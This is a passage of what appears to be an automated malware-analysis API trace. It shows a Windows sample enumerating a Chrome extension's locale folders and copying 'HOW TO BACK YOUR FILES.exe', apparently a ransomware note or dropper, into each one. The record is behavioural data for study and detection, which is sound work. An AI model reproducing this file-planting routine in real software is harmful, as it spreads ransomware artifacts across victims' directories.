ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d719280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0111.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi" [0111.286] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.286] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.287] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.287] GetLastError () returned 0x0 [0111.288] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834608b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d73f3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d73f3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.288] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0111.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa" [0111.288] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.288] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.289] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.289] GetLastError () returned 0x0 [0111.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83459380, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d73f3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d73f3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.290] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0111.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et" [0111.290] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.290] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.290] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.291] GetLastError () returned 0x0 [0111.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83451e50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d765540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d765540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.291] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0111.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0111.292] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.292] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.292] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.293] GetLastError () returned 0x0 [0111.293] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8344a920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d765540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d765540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.293] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0111.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0111.293] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.293] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.294] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.294] GetLastError () returned 0x0 [0111.294] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8343bec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.295] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0111.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0111.295] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.295] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.296] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.296] GetLastError () returned 0x0 [0111.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.296] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83434990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.297] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0111.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0111.297] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.297] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.297] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.298] GetLastError () returned 0x0 [0111.298] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8342d460, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.298] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0111.299] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0111.299] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.299] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.299] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.300] GetLastError () returned 0x0 [0111.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83425f30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7b1800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7b1800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 